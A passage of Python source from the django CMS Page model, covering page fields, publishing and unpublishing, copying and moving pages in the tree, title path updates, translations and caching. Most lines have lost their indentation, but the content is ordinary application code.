in_navigation = models.BooleanField(_("in navigation"), default=True, db_index=True)
soft_root = models.BooleanField(_("soft root"), db_index=True, default=False,
help_text=_("All ancestors will not be displayed in the navigation"))
reverse_id = models.CharField(_("id"), max_length=40, db_index=True, blank=True, null=True, help_text=_(
"A unique identifier that is used with the page_url templatetag for linking to this page"))
navigation_extenders = models.CharField(_("attached menu"), max_length=80, db_index=True, blank=True, null=True)
template = models.CharField(_("template"), max_length=100, choices=template_choices,
help_text=_('The template used to render the content.'),
default=TEMPLATE_DEFAULT)
login_required = models.BooleanField(_("login required"), default=False)
limit_visibility_in_menu = models.SmallIntegerField(_("menu visibility"), default=None, null=True, blank=True,
choices=LIMIT_VISIBILITY_IN_MENU_CHOICES, db_index=True,
help_text=_("limit when this page is visible in the menu"))
is_home = models.BooleanField(editable=False, db_index=True, default=False)
application_urls = models.CharField(_('application'), max_length=200, blank=True, null=True, db_index=True)
application_namespace = models.CharField(_('application instance name'), max_length=200, blank=True, null=True)
# Placeholders (plugins)
placeholders = models.ManyToManyField('cms.Placeholder', editable=False)
# Publisher fields
publisher_is_draft = models.BooleanField(default=True, editable=False, db_index=True)
# This is misnamed - the one-to-one relation is populated on both ends
publisher_public = models.OneToOneField(
'self',
on_delete=models.CASCADE,
related_name='publisher_draft',
null=True,
editable=False,
)
languages = models.CharField(max_length=255, editable=False, blank=True, null=True)
# X Frame Options for clickjacking protection
xframe_options = models.IntegerField(
choices=X_FRAME_OPTIONS_CHOICES,
default=get_cms_setting('DEFAULT_X_FRAME_OPTIONS'),
)
# Flag that marks a page as page-type
is_page_type = models.BooleanField(default=False)
node = models.ForeignKey(
'TreeNode',
related_name='cms_pages',
on_delete=models.CASCADE,
)
# Managers
objects = PageManager()
class Meta:
permissions = (
('view_page', 'Can view page'),
('publish_page', 'Can publish page'),
('edit_static_placeholder', 'Can edit static placeholders'),
)
unique_together = ('node', 'publisher_is_draft')
verbose_name = _('page')
verbose_name_plural = _('pages')
app_label = 'cms'
def __init__(self, *args, **kwargs):
super(Page, self).__init__(*args, **kwargs)
self.title_cache = {}
def __str__(self):
try:
title = self.get_menu_title(fallback=True)
except LanguageError:
try:
title = self.title_set.all()[0]
except IndexError:
title = None
if title is None:
title = u""
return force_text(title)
def __repr__(self):
display = '<{module}.{class_name} id={id} is_draft={is_draft} object at {location}>'.format(
module=self.__module__,
class_name=self.__class__.__name__,
id=self.pk,
is_draft=self.publisher_is_draft,
location=hex(id(self)),
)
return display
def _clear_node_cache(self):
if hasattr(self, '_node_cache'):
del self._node_cache
if hasattr(self, 'fields_cache'):
# Django >= 2.0
self.fields_cache = {}
def _clear_internal_cache(self):
self.title_cache = {}
self._clear_node_cache()
if hasattr(self, '_prefetched_objects_cache'):
del self._prefetched_objects_cache
@property
def parent(self):
warnings.warn(
'Pages no longer have a "parent" field. '
'To get the parent object of any given page, use the "parent_page" attribute. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.parent_page
@property
def parent_id(self):
warnings.warn(
'Pages no longer have a "parent_id" attribute. '
'To get the parent id of any given page, '
'call "pk" on the "parent_page" attribute. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
if self.parent_page:
return self.parent_page.pk
return None
@property
def site(self):
warnings.warn(
'Pages no longer have a "site" field. '
'To get the site object of any given page, '
'call "site" on the page "node" object. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.node.site
@property
def site_id(self):
warnings.warn(
'Pages no longer have a "site_id" attribute. '
'To get the site id of any given page, '
'call "site_id" on the page "node" object. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.node.site_id
@cached_property
def parent_page(self):
return self.get_parent_page()
def set_as_homepage(self, user=None):
"""
Sets the given page as the homepage.
Updates the title paths for all affected pages.
Returns the old home page (if any).
"""
assert self.publisher_is_draft
if user:
changed_by = get_clean_username(user)
else:
changed_by = constants.SCRIPT_USERNAME
changed_date = now()
try:
old_home = self.__class__.objects.get(
is_home=True,
node__site=self.node.site_id,
publisher_is_draft=True,
)
except self.__class__.DoesNotExist:
old_home_tree = []
else:
old_home.update(
draft_only=False,
is_home=False,
changed_by=changed_by,
changed_date=changed_date,
)
old_home_tree = old_home._set_title_root_path()
self.update(
draft_only=False,
is_home=True,
changed_by=changed_by,
changed_date=changed_date,
)
new_home_tree = self._remove_title_root_path()
return (new_home_tree, old_home_tree)
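    # Homepage bookkeeping: the previous home gets its slug re-added as a path
    # prefix for its whole subtree (_set_title_root_path), while the new home
    # has that prefix stripped (_remove_title_root_path), since the homepage
    # is served from the site root.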
def _update_title_path(self, language):
parent_page = self.get_parent_page()
if parent_page:
base = parent_page.get_path(language, fallback=True)
else:
base = ''
title_obj = self.get_title_obj(language, fallback=False)
new_path = title_obj.get_path_for_base(base)
title_obj.path = new_path
title_obj.save()
def _update_title_path_recursive(self, language):
assert self.publisher_is_draft
from cms.models import Title
if self.node.is_leaf() or language not in self.get_languages():
return
base = self.get_path(language, fallback=True)
pages = self.get_child_pages()
(Title
.objects
.filter(language=language, page__in=pages)
.exclude(has_url_overwrite=True)
.update(path=Concat(models.Value(base), models.Value('/'), models.F('slug'))))
for child in pages.filter(title_set__language=language).iterator():
child._update_title_path_recursive(language)
def _set_title_root_path(self):
from cms.models import Title
node_tree = TreeNode.get_tree(self.node)
page_tree = self.__class__.objects.filter(node__in=node_tree)
translations = Title.objects.filter(page__in=page_tree, has_url_overwrite=False)
for language, slug in self.title_set.values_list('language', 'slug'):
# Update the translations for all descendants of this page
# to include this page's slug as its path prefix
(translations
.filter(language=language)
.update(path=Concat(models.Value(slug), models.Value('/'), 'path')))
# Explicitly update this page's path to match its slug
# Doing this is cheaper than a TRIM call to remove the "/" characters
if self.publisher_public_id:
# include the public translation
current_translations = Title.objects.filter(page__in=[self.pk, self.publisher_public_id])
else:
current_translations = self.title_set.all()
current_translations.filter(language=language).update(path=slug)
return page_tree
def _remove_title_root_path(self):
from cms.models import Title
node_tree = TreeNode.get_tree(self.node)
page_tree = self.__class__.objects.filter(node__in=node_tree)
translations = Title.objects.filter(page__in=page_tree, has_url_overwrite=False)
        for language, slug in self.title_set.values_list('language', 'slug'):
            # SQL substr() is 1-indexed, and the "/" separator after the slug
            # must be trimmed as well, hence len(slug) + 2.
            trim_count = len(slug) + 2
sql_func = models.Func(
models.F('path'),
models.Value(trim_count),
function='substr',
)
(translations
.filter(language=language, path__startswith=slug)
.update(path=sql_func))
return page_tree
def is_dirty(self, language):
state = self.get_publisher_state(language)
return state == PUBLISHER_STATE_DIRTY or state == PUBLISHER_STATE_PENDING
def is_potential_home(self):
"""
Encapsulates logic for determining if this page is eligible to be set
as `is_home`. This is a public method so that it can be accessed in the
admin for determining whether to enable the "Set as home" menu item.
:return: Boolean
"""
assert self.publisher_is_draft
# Only root nodes are eligible for homepage
return not self.is_home and bool(self.node.is_root())
def get_absolute_url(self, language=None, fallback=True):
if not language:
language = get_current_language()
with force_language(language):
if self.is_home:
return reverse('pages-root')
path = self.get_path(language, fallback) or self.get_slug(language, fallback)
return reverse('pages-details-by-slug', kwargs={"slug": path})
def get_public_url(self, language=None, fallback=True):
"""
Returns the URL of the published version of the current page.
Returns empty string if the page is not published.
"""
try:
return self.get_public_object().get_absolute_url(language, fallback)
        except Exception:
return ''
def get_draft_url(self, language=None, fallback=True):
"""
Returns the URL of the draft version of the current page.
Returns empty string if the draft page is not available.
"""
try:
return self.get_draft_object().get_absolute_url(language, fallback)
        except Exception:
return ''
def set_tree_node(self, site, target=None, position='first-child'):
assert self.publisher_is_draft
assert position in ('last-child', 'first-child', 'left', 'right')
new_node = TreeNode(site=site)
if target is None:
self.node = TreeNode.add_root(instance=new_node)
elif position == 'first-child' and target.is_branch:
self.node = target.get_first_child().add_sibling(pos='left', instance=new_node)
elif position in ('last-child', 'first-child'):
self.node = target.add_child(instance=new_node)
else:
self.node = target.add_sibling(pos=position, instance=new_node)
def move_page(self, target_node, position='first-child'):
"""
Called from admin interface when page is moved. Should be used on
all the places which are changing page position. Used like an interface
to django-treebeard, but after move is done page_moved signal is fired.
        Note for issue #1166: url conflicts are handled by the updated
        check_title_slugs; overwrite_url on the moved page doesn't need any
        check, as it remains the same regardless of the page's position in the tree.
"""
assert self.publisher_is_draft
assert isinstance(target_node, TreeNode)
inherited_template = self.template == constants.TEMPLATE_INHERITANCE_MAGIC
if inherited_template and target_node.is_root() and position in ('left', 'right'):
# The page is being moved to a root position.
# Explicitly set the inherited template on the page
# to keep all plugins / placeholders.
self.update(refresh=False, template=self.get_template())
# Don't use a cached node. Always get a fresh one.
self._clear_node_cache()
# Runs the SQL updates on the treebeard fields
self.node.move(target_node, position)
if position in ('first-child', 'last-child'):
parent_id = target_node.pk
else:
# moving relative to sibling
# or to the root of the tree
parent_id = target_node.parent_id
# Runs the SQL updates on the parent field
self.node.update(parent_id=parent_id)
# Clear the cached node once again to trigger a db query
# on access.
self._clear_node_cache()
# Update the descendants to "PENDING"
# If the target (parent) page is not published
# and the page being moved is published.
titles = (
self
.title_set
.filter(language__in=self.get_languages())
.values_list('language', 'published')
)
parent_page = self.get_parent_page()
if parent_page:
parent_titles = (
parent_page
.title_set
.exclude(publisher_state=PUBLISHER_STATE_PENDING)
.values_list('language', 'published')
)
parent_titles_by_language = dict(parent_titles)
else:
parent_titles_by_language = {}
for language, published in titles:
parent_is_published = parent_titles_by_language.get(language)
# Update draft title path
self._update_title_path(language)
self._update_title_path_recursive(language)
if published and parent_is_published:
# this looks redundant but it's necessary
# for all the descendants of the page being
# moved to be set to the correct state.
self.publisher_public._update_title_path(language)
self.mark_as_published(language)
self.mark_descendants_as_published(language)
elif published and parent_page:
                # page is published but its parent is not;
# mark the page being moved (source) as "pending"
self.mark_as_pending(language)
# mark all descendants of source as "pending"
self.mark_descendants_pending(language)
elif published:
self.publisher_public._update_title_path(language)
self.mark_as_published(language)
self.mark_descendants_as_published(language)
self.clear_cache()
return self
def _copy_titles(self, target, language, published):
"""
Copy the title matching language to a new page (which must have a pk).
:param target: The page where the new title should be stored
"""
source_title = self.title_set.get(language=language)
try:
target_title_id = (
target
.title_set
.filter(language=language)
.values_list('pk', flat=True)[0]
)
except IndexError:
target_title_id = None
source_title_id = source_title.pk
# If an old title exists, overwrite. Otherwise create new
source_title.pk = target_title_id
source_title.page = target
source_title.publisher_is_draft = target.publisher_is_draft
source_title.publisher_public_id = source_title_id
source_title.published = published
source_title._publisher_keep_state = True
if published:
source_title.publisher_state = PUBLISHER_STATE_DEFAULT
else:
source_title.publisher_state = PUBLISHER_STATE_PENDING
source_title.save()
return source_title
def _clear_placeholders(self, language):
from cms.models import CMSPlugin
from cms.signals.utils import disable_cms_plugin_signals
placeholders = list(self.get_placeholders())
placeholder_ids = (placeholder.pk for placeholder in placeholders)
with disable_cms_plugin_signals():
plugins = CMSPlugin.objects.filter(
language=language,
placeholder__in=placeholder_ids,
)
models.query.QuerySet.delete(plugins)
return placeholders
def _copy_contents(self, target, language):
"""
Copy all the plugins to a new page.
:param target: The page where the new content should be stored
"""
cleared_placeholders = target._clear_placeholders(language)
cleared_placeholders_by_slot = {pl.slot: pl for pl in cleared_placeholders}
for placeholder in self.get_placeholders():
try:
target_placeholder = cleared_placeholders_by_slot[placeholder.slot]
except KeyError:
target_placeholder = target.placeholders.create(
slot=placeholder.slot,
default_width=placeholder.default_width,
)
placeholder.copy_plugins(target_placeholder, language=language)
def _copy_attributes(self, target, clean=False):
"""
Copy all page data to the target. This excludes parent and other values
that are specific to an exact instance.
:param target: The Page to copy the attributes to
"""
if not clean:
target.publication_date = self.publication_date
target.publication_end_date = self.publication_end_date
target.reverse_id = self.reverse_id
target.changed_by = self.changed_by
target.login_required = self.login_required
target.in_navigation = self.in_navigation
target.soft_root = self.soft_root
target.limit_visibility_in_menu = self.limit_visibility_in_menu
target.navigation_extenders = self.navigation_extenders
target.application_urls = self.application_urls
target.application_namespace = self.application_namespace
target.template = self.template
target.xframe_options = self.xframe_options
target.is_page_type = self.is_page_type
def copy(self, site, parent_node=None, language=None,
translations=True, permissions=False, extensions=True):
from cms.utils.page import get_available_slug
if parent_node:
new_node = parent_node.add_child(site=site)
parent_page = parent_node.item
else:
new_node = TreeNode.add_root(site=site)
parent_page = None
new_page = copy.copy(self)
new_page._clear_internal_cache()
new_page.pk = None
new_page.node = new_node
new_page.publisher_public_id = None
new_page.is_home = False
new_page.reverse_id = None
new_page.publication_date = None
new_page.publication_end_date = None
new_page.languages = ''
new_page.save()
# Have the node remember its page.
# This is done to save some queries
# when the node's descendants are copied.
new_page.node.__dict__['item'] = new_page
if language and translations:
translations = self.title_set.filter(language=language)
elif translations:
translations = self.title_set.all()
else:
translations = self.title_set.none()
# copy titles of this page
for title in translations:
title = copy.copy(title)
title.pk = None
title.page = new_page
title.published = False
title.publisher_public = None
if parent_page:
base = parent_page.get_path(title.language)
path = '%s/%s' % (base, title.slug)
else:
base = ''
path = title.slug
slug = get_available_slug(site, path, title.language)
title.slug = slug
title.path = '%s/%s' % (base, slug) if base else slug
title.save()
new_page.title_cache[title.language] = title
# copy the placeholders (and plugins on those placeholders!)
for placeholder in self.placeholders.iterator():
new_placeholder = copy.copy(placeholder)
new_placeholder.pk = None
new_placeholder.save()
new_page.placeholders.add(new_placeholder)
placeholder.copy_plugins(new_placeholder, language=language)
if extensions:
from cms.extensions import extension_pool
extension_pool.copy_extensions(self, new_page)
# copy permissions if requested
if permissions and get_cms_setting('PERMISSION'):
permissions = self.pagepermission_set.iterator()
permissions_new = []
for permission in permissions:
permission.pk = None
permission.page = new_page
permissions_new.append(permission)
if permissions_new:
new_page.pagepermission_set.bulk_create(permissions_new)
return new_page
def copy_with_descendants(self, target_node=None, position=None,
copy_permissions=True, target_site=None):
"""
Copy a page [ and all its descendants to a new location ]
"""
if not self.publisher_is_draft:
raise PublicIsUnmodifiable("copy page is not allowed for public pages")
if position in ('first-child', 'last-child'):
parent_node = target_node
elif target_node:
parent_node = target_node.parent
else:
parent_node = None
if target_site is None:
target_site = parent_node.site if parent_node else self.node.site
# Evaluate the descendants queryset BEFORE copying the page.
# Otherwise, if the page is copied and pasted on itself, it will duplicate.
descendants = list(
self.get_descendant_pages()
.select_related('node')
.prefetch_related('title_set')
)
new_root_page = self.copy(target_site, parent_node=parent_node)
new_root_node = new_root_page.node
        if target_node and position == 'first-child':
# target node is a parent and user has requested to
# insert the new page as its first child
new_root_node.move(target_node, position)
new_root_node.refresh_from_db(fields=('path', 'depth'))
if target_node and position in ('left', 'last-child'):
# target node is a sibling
new_root_node.move(target_node, position)
new_root_node.refresh_from_db(fields=('path', 'depth'))
nodes_by_id = {self.node.pk: new_root_node}
for page in descendants:
parent = nodes_by_id[page.node.parent_id]
new_page = page.copy(
target_site,
parent_node=parent,
translations=True,
permissions=copy_permissions,
)
nodes_by_id[page.node_id] = new_page.node
return new_root_page
def delete(self, *args, **kwargs):
TreeNode.get_tree(self.node).delete_fast()
if self.node.parent_id:
(TreeNode
.objects
.filter(pk=self.node.parent_id)
.update(numchild=models.F('numchild') - 1))
self.clear_cache(menu=True)
def delete_translations(self, language=None):
if language is None:
languages = self.get_languages()
else:
languages = [language]
self.title_set.filter(language__in=languages).delete()
for language in languages:
self.mark_descendants_pending(language)
def save(self, **kwargs):
# delete template cache
if hasattr(self, '_template_cache'):
delattr(self, '_template_cache')
created = not bool(self.pk)
if self.reverse_id == "":
self.reverse_id = None
if self.application_namespace == "":
self.application_namespace = None
from cms.utils.permissions import get_current_user_name
self.changed_by = get_current_user_name()
if created:
self.created_by = self.changed_by
super(Page, self).save(**kwargs)
def save_base(self, *args, **kwargs):
"""Overridden save_base. If an instance is draft, and was changed, mark
it as dirty.
Dirty flag is used for changed nodes identification when publish method
takes place. After current changes are published, state is set back to
PUBLISHER_STATE_DEFAULT (in publish method).
"""
keep_state = getattr(self, '_publisher_keep_state', None)
if self.publisher_is_draft and not keep_state and self.is_new_dirty():
self.title_set.all().update(publisher_state=PUBLISHER_STATE_DIRTY)
if keep_state:
delattr(self, '_publisher_keep_state')
return super(Page, self).save_base(*args, **kwargs)
def update(self, refresh=False, draft_only=True, **data):
assert self.publisher_is_draft
cls = self.__class__
if not draft_only and self.publisher_public_id:
ids = [self.pk, self.publisher_public_id]
cls.objects.filter(pk__in=ids).update(**data)
else:
cls.objects.filter(pk=self.pk).update(**data)
if refresh:
return self.reload()
else:
for field, value in data.items():
setattr(self, field, value)
return
def update_translations(self, language=None, **data):
if language:
translations = self.title_set.filter(language=language)
else:
translations = self.title_set.all()
return translations.update(**data)
def has_translation(self, language):
return self.title_set.filter(language=language).exists()
def is_new_dirty(self):
if self.pk:
fields = [
'publication_date', 'publication_end_date', 'in_navigation', 'soft_root', 'reverse_id',
'navigation_extenders', 'template', 'login_required', 'limit_visibility_in_menu'
]
try:
old_page = Page.objects.get(pk=self.pk)
except Page.DoesNotExist:
return True
for field in fields:
old_val = getattr(old_page, field)
new_val = getattr(self, field)
                if old_val != new_val:
return True
return False
return True
def is_published(self, language, force_reload=False):
title_obj = self.get_title_obj(language, fallback=False, force_reload=force_reload)
return title_obj.published and title_obj.publisher_state != PUBLISHER_STATE_PENDING
def toggle_in_navigation(self, set_to=None):
        """
        Toggles (or sets) in_navigation and invalidates the cms page cache
        """
old = self.in_navigation
if set_to in [True, False]:
self.in_navigation = set_to
else:
self.in_navigation = not self.in_navigation
self.save()
# If there was a change, invalidate the cms page cache
if self.in_navigation != old:
self.clear_cache()
return self.in_navigation
def get_publisher_state(self, language, force_reload=False):
try:
return self.get_title_obj(language, False, force_reload=force_reload).publisher_state
except AttributeError:
return None
def set_publisher_state(self, language, state, published=None):
title = self.title_set.get(language=language)
title.publisher_state = state
if published is not None:
title.published = published
title._publisher_keep_state = True
title.save()
if language in self.title_cache:
self.title_cache[language].publisher_state = state
return title
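    # Publishing workflow: publish() copies this draft's attributes, the title
    # for the given language and all plugin content onto the public instance,
    # then cascades the published state down the tree with
    # mark_descendants_as_published(); unpublish() is the mirror operation.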
def publish(self, language):
"""
:returns: True if page was successfully published.
"""
from cms.utils.permissions import get_current_user_name
# Publish can only be called on draft pages
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be published. Use draft.')
if not self._publisher_can_publish(language):
return False
if self.publisher_public_id:
public_page = Page.objects.get(pk=self.publisher_public_id)
public_languages = public_page.get_languages()
else:
public_page = Page(created_by=self.created_by)
public_languages = [language]
self._copy_attributes(public_page, clean=False)
if language not in public_languages:
public_languages.append(language)
# TODO: Get rid of the current user thread hack
public_page.changed_by = get_current_user_name()
public_page.is_home = self.is_home
public_page.publication_date = self.publication_date or now()
public_page.publisher_public = self
public_page.publisher_is_draft = False
public_page.languages = ','.join(public_languages)
public_page.node = self.node
public_page.save()
# Copy the page translation (title) matching language
# into a "public" version.
public_title = self._copy_titles(public_page, language, published=True)
# Ensure this draft page points to its public version
self.update(
draft_only=True,
changed_by=public_page.changed_by,
publisher_public=public_page,
publication_date=public_page.publication_date,
)
# Set the draft page translation matching language
# to point to its public version.
        # It's important for the draft to be marked published even if its state
        # is pending.
self.update_translations(
language,
published=True,
publisher_public=public_title,
publisher_state=PUBLISHER_STATE_DEFAULT,
)
self._copy_contents(public_page, language)
if self.node.is_branch:
self.mark_descendants_as_published(language)
if language in self.title_cache:
del self.title_cache[language]
# fire signal after publishing is done
import cms.signals as cms_signals
cms_signals.post_publish.send(sender=Page, instance=self, language=language)
public_page.clear_cache(
language,
menu=True,
placeholder=True,
)
return True
def clear_cache(self, language=None, menu=False, placeholder=False):
from cms.cache import invalidate_cms_page_cache
if get_cms_setting('PAGE_CACHE'):
# Clears all the page caches
invalidate_cms_page_cache()
if placeholder and get_cms_setting('PLACEHOLDER_CACHE'):
assert language, 'language is required when clearing placeholder cache'
placeholders = self.get_placeholders()
for placeholder in placeholders:
placeholder.clear_cache(language, site_id=self.node.site_id)
if menu:
# Clears all menu caches for this page's site
menu_pool.clear(site_id=self.node.site_id)
def unpublish(self, language, site=None):
"""
Removes this page from the public site
:returns: True if this page was successfully unpublished
"""
# Publish can only be called on draft pages
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be unpublished. Use draft.')
self.update_translations(
language,
published=False,
publisher_state=PUBLISHER_STATE_DIRTY,
)
public_page = self.get_public_object()
public_page.update_translations(language, published=False)
public_page._clear_placeholders(language)
public_page.clear_cache(language)
self.mark_descendants_pending(language)
from cms.signals import post_unpublish
post_unpublish.send(sender=Page, instance=self, language=language)
return True
def get_child_pages(self):
nodes = self.node.get_children()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
def get_ancestor_pages(self):
nodes = self.node.get_ancestors()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
def get_descendant_pages(self):
nodes = self.node.get_descendants()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
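    # treebeard materialized paths use a fixed-width segment of `steplen`
    # characters per depth level, so the first `steplen` characters of any
    # node's path identify its root node.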
def get_root(self):
node = self.node
return self.__class__.objects.get(
node__path=node.path[0:node.steplen],
publisher_is_draft=self.publisher_is_draft,
)
def get_parent_page(self):
if not self.node.parent_id:
return None
pages = Page.objects.filter(
node=self.node.parent_id,
publisher_is_draft=self.publisher_is_draft,
)
return pages.select_related('node').first()
def mark_as_pending(self, language):
assert self.publisher_is_draft
assert self.publisher_public_id
self.get_public_object().title_set.filter(language=language).update(published=False)
if self.get_publisher_state(language) == PUBLISHER_STATE_DEFAULT:
# Only change the state if the draft page is published
            # and its state is the default (0), to avoid overriding a dirty state.
self.set_publisher_state(language, state=PUBLISHER_STATE_PENDING)
def mark_descendants_pending(self, language):
from cms.models import Title
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be altered. Use draft.')
node_descendants = self.node.get_descendants()
page_descendants = self.__class__.objects.filter(node__in=node_descendants)
if page_descendants.filter(publisher_is_draft=True).exists():
# Only change the state if the draft page is not dirty
# to avoid overriding a dirty state.
Title.objects.filter(
published=True,
language=language,
page__in=page_descendants.filter(publisher_is_draft=True),
publisher_state=PUBLISHER_STATE_DEFAULT,
).update(publisher_state=PUBLISHER_STATE_PENDING)
if page_descendants.filter(publisher_is_draft=False).exists():
Title.objects.filter(
published=True,
language=language,
page__in=page_descendants.filter(publisher_is_draft=False),
).update(published=False)
def mark_as_published(self, language):
from cms.models import Title
(Title
.objects
.filter(page=self.publisher_public_id, language=language)
.update(publisher_state=PUBLISHER_STATE_DEFAULT, published=True))
draft = self.get_draft_object()
if draft.get_publisher_state(language) == PUBLISHER_STATE_PENDING:
# A check for pending is necessary because the page might have
# been modified after it was marked as pending.
draft.set_publisher_state(language, PUBLISHER_STATE_DEFAULT)
def mark_descendants_as_published(self, language):
from cms.models import Title
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be published. Use draft.')
base = self.get_path(language, fallback=True)
node_children = self.node.get_children()
page_children = self.__class__.objects.filter(node__in=node_children)
page_children_draft = page_children.filter(publisher_is_draft=True)
page_children_public = page_children.filter(publisher_is_draft=False)
# Set public pending titles as published
unpublished_public = Title.objects.filter(
language=language,
page__in=page_children_public,
publisher_public__published=True,
)
# Update public title paths
unpublished_public.exclude(has_url_overwrite=True).update(
path=Concat(models.Value(base), models.Value('/'), models.F('slug'))
)
# Set unpublished pending titles to published
unpublished_public.filter(published=False).update(published=True)
# Update drafts
Title.objects.filter(
published=True,
language=language,
page__in=page_children_draft,
publisher_state=PUBLISHER_STATE_PENDING
).update(publisher_state=PUBLISHER_STATE_DEFAULT)
# Continue publishing descendants, one branch at a time.
published_children = page_children_draft.filter(
title_set__published=True,
title_set__language=language,
)
for child in published_children.iterator():
child.mark_descendants_as_published(language)
def revert_to_live(self, language):
"""Revert the draft version to the same state as the public version
"""
if not self.publisher_is_draft:
# Revert can only be called on draft pages
raise PublicIsUnmodifiable('The public instance cannot be reverted. Use draft.')
public = self.get_public_object()
if not public:
raise PublicVersionNeeded('A public version of this page is needed')
public._copy_attributes(self)
public._copy_contents(self, language)
public._copy_titles(self, language, public.is_published(language))
self.update_translations(
language,
published=True,
publisher_state=PUBLISHER_STATE_DEFAULT,
)
self._publisher_keep_state = True
self.save()
def get_draft_object(self):
if not self.publisher_is_draft:
return self.publisher_draft
return self
def get_public_object(self):
if not self.publisher_is_draft:
return self
return self.publisher_public
def get_languages(self):
if self.languages:
return sorted(self.languages.split(','))
else:
return []
def remove_language(self, language):
page_languages = self.get_languages()
if language in page_languages:
page_languages.remove(language)
self.update_languages(page_languages)
def update_languages(self, languages):
languages = ",".join(languages)
# Update current instance
self.languages = languages
        # Commit directly. It's important not to call save():
        # we want to persist only the languages field,
        # without firing any kind of signals.
self.update(draft_only=False, languages=languages)
def get_published_languages(self):
if self.publisher_is_draft:
return self.get_languages()
return sorted([language for language in self.get_languages() if self.is_published(language)])
def set_translations_cache(self):
for translation in self.title_set.all():
self.title_cache.setdefault(translation.language, translation)
def get_path_for_slug(self, slug, language):
if self.is_home:
return ''
if self.parent_page:
base = self.parent_page.get_path(language, fallback=True)
# base can be empty when the parent is a home-page
path = u'%s/%s' % (base, slug) if base else slug
else:
path = slug
return path
# ## Title object access
def get_title_obj(self, language=None, fallback=True, force_reload=False):
"""Helper function for accessing wanted / current title.
If wanted title doesn't exists, EmptyTitle instance will be returned.
"""
language = self._get_title_cache(language, fallback, force_reload)
if language in self.title_cache:
return self.title_cache[language]
from cms.models.titlemodels import EmptyTitle
return EmptyTitle(language)
def get_title_obj_attribute(self, attrname, language=None, fallback=True, force_reload=False):
"""Helper function for getting attribute or None from wanted/current title.
"""
try:
attribute = getattr(self.get_title_obj(language, fallback, force_reload), attrname)
return attribute
except AttributeError:
return None
def get_path(self, language=None, fallback=True, force_reload=False):
"""
get the path of the page depending on the given language
"""
return self.get_title_obj_attribute("path", language, fallback, force_reload)
def get_slug(self, language=None, fallback=True, force_reload=False):
"""
get the slug of the page depending on the given language
"""
return self.get_title_obj_attribute("slug", language, fallback, force_reload)
def get_title(self, language=None, fallback=True, force_reload=False):
"""
get the title of the page depending on the given language
"""
return self.get_title_obj_attribute("title", language, fallback, force_reload)
def get_menu_title(self, language=None, fallback=True, force_reload=False):
"""
get the menu title of the page depending on the given language
"""
menu_title = self.get_title_obj_attribute("menu_title", language, fallback, force_reload)
if not menu_title:
return self.get_title(language, True, force_reload)
return menu_title
def get_placeholders(self):
if not hasattr(self, '_placeholder_cache'):
self._placeholder_cache = self.placeholders.all()
return self._placeholder_cache
def _validate_title(self, title):
from cms.models.titlemodels import EmptyTitle
if isinstance(title, EmptyTitle):
return False
if not title.title or not title.slug:
return False
return True
def get_admin_tree_title(self):
from cms.models.titlemodels import EmptyTitle
language = get_language()
if not self.title_cache:
self.set_translations_cache()
if language not in self.title_cache or not self._validate_title(self.title_cache.get(language, EmptyTitle(language))):
fallback_langs = i18n.get_fallback_languages(language)
found = False
for lang in fallback_langs:
if lang in self.title_cache and self._validate_title(self.title_cache.get(lang, EmptyTitle(lang))):
found = True
language = lang
if not found:
language = None
for lang, item in self.title_cache.items():
if not isinstance(item, EmptyTitle):
language = lang
if not language:
return _("Empty")
title = self.title_cache[language]
if title.title:
return title.title
if title.page_title:
return title.page_title
if title.menu_title:
return title.menu_title
return title.slug
def get_changed_date(self, language=None, fallback=True, force_reload=False):
"""
get when this page was last updated
"""
return self.changed_date
def get_changed_by(self, language=None, fallback=True, force_reload=False):
"""
get user who last changed this page
"""
return self.changed_by
def get_page_title(self, language=None, fallback=True, force_reload=False):
"""
get the page title of the page depending on the given language
"""
page_title = self.get_title_obj_attribute("page_title", language, fallback, force_reload)
if not page_title:
return self.get_title(language, True, force_reload)
return page_title
def get_meta_description(self, language=None, fallback=True, force_reload=False):
"""
get content for the description meta tag for the page depending on the given language
"""
return self.get_title_obj_attribute("meta_description", language, fallback, force_reload)
def get_application_urls(self, language=None, fallback=True, force_reload=False):
"""
get application urls conf for application hook
"""
return self.application_urls
def get_redirect(self, language=None, fallback=True, force_reload=False):
"""
get redirect
"""
return self.get_title_obj_attribute("redirect", language, fallback, force_reload)
def _get_title_cache(self, language, fallback, force_reload):
if not language:
language = get_language()
force_reload = (force_reload or language not in self.title_cache)
if fallback and not self.title_cache.get(language):
# language can be in the cache but might be an EmptyTitle instance
fallback_langs = i18n.get_fallback_languages(language)
for lang in fallback_langs:
if self.title_cache.get(lang):
return lang
if force_reload:
from cms.models.titlemodels import Title
titles = Title.objects.filter(page=self)
for title in titles:
self.title_cache[title.language] = title
if self.title_cache.get(language):
return language
else:
if fallback:
fallback_langs = i18n.get_fallback_languages(language)
for lang in fallback_langs:
if self.title_cache.get(lang):
return lang
return language
def get_template(self):
"""
get the template of this page if defined or if closer parent if
defined or DEFAULT_PAGE_TEMPLATE otherwise
"""
if hasattr(self, '_template_cache'):
return self._template_cache
if self.template != constants.TEMPLATE_INHERITANCE_MAGIC:
self._template_cache = self.template or get_cms_setting('TEMPLATES')[0][0]
return self._template_cache
templates = (
self
.get_ancestor_pages()
.exclude(template=constants.TEMPLATE_INHERITANCE_MAGIC)
.order_by('-node__path')
.values_list('template', flat=True)
)
try:
self._template_cache = templates[0]
except IndexError:
self._template_cache = get_cms_setting('TEMPLATES')[0][0]
return self._template_cache
def get_template_name(self):
"""
get the textual name (2nd parameter in get_cms_setting('TEMPLATES'))
of the template of this page or of the nearest
ancestor. failing to find that, return the name of the default template.
"""
template = self.get_template()
for t in get_cms_setting('TEMPLATES'):
if t[0] == template:
return t[1]
return _("default")
def has_view_permission(self, user):
